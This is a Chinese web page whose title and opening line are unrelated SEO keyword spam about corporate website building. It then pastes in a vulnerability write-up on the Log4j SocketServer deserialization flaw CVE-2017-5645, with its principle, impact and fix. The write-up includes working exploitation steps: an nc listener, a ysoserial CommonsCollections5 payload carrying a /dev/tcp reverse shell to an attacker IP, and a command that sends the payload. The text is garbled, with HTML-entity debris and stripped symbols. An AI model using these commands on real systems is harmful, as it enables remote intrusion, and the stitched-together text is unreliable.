企业官网建设流程全解析

多语言版本的网站,世界著名室内设计案例,wordpress 产品展示主题,北京网站建设兴田德润官网多少CVSS评分#xff1a;9.8#xff08;严重#xff09; CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞 1. 漏洞原理2. 漏洞危害3. 漏洞修复 1. 漏洞原理 Apache Log4j是美国阿帕奇#xff08;Apache#xff09;基金会的一款基于Java的开源日志记录工具。Apache …CVSS评分9.8严重CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞1. 漏洞原理2. 漏洞危害3. 漏洞修复1. 漏洞原理Apache Log4j是美国阿帕奇Apache基金会的一款基于Java的开源日志记录工具。Apache Log4j 2.8.2之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码。漏洞利用链攻击者 ↓ TCP / UDP 发送恶意序列化对象 ↓ Log4j SocketServer ↓ ObjectInputStream.readObject() ↓ Gadget chain ↓ 任意代码执行攻击者需要满足条件目标服务器开启并监听 Log4j Socket ServerTCP 或 UDP端口可以向服务器发送任意数据包具体利用路径概括如下攻击者构造特制的 Java 序列化对象字节流包含恶意链通过网络向 Log4j 的 socket 端口发送该 payloadLog4j 接收到数据后反序列化该对象恶意对象触发执行攻击者指定的系统命令step1、nc 监听本地https://www.revshells.com/nc-lvnp90012、生成恶意payloadjava -jar ysoserial.jar CommonsCollections5sh -i /dev/tcp/172.30.22.210/9001 01payload.bin3、发送反弹shellnc172.xxx.xxx.xxx5007payload.bin2. 漏洞危害微步标记为高风险重点两高一弱漏洞该漏洞可导致直接RCE尽快修复3. 漏洞修复升级到Apache Log4j 2.8.2 或以上版本